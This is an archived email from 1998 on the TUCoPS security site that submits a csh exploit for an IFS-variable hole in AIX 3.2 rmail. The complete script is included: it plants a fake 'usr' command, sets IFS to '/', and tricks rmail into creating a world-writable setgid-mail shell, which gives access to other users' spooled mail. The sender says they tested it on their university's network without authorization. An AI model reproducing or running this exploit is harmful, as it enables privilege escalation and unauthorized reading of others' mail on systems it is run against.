TUCoPS :: Unix :: Various Flavours :: aix32r~1.txt

AIX 3.2 rmail hole



Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
To: fyodor@dhp.com
Subject: AIX oldie

hi fyodor,

first let met tell you that your pages are great - but you already
know that, don't you?

i noticed you have an exploit section sorted by os; here's an oldie
but goodie for AIX boxes running 3.2, the exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
i successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)

i guess you probably know of this ancient IFS hole; just in case you
wanted to include it into your pages ...

cya & keep up the marvelous work,

[cut]

-----------snip------------
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail.
# Setup needed files.

mkdir /tmp/.rmail
cd /tmp/.rmail

cat <<EOF>usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .

# Set PATH, IFS, and run rmail.

setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup. 
echo "Attempting to run sgid shell."
./mailsh
-----------snip------------



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH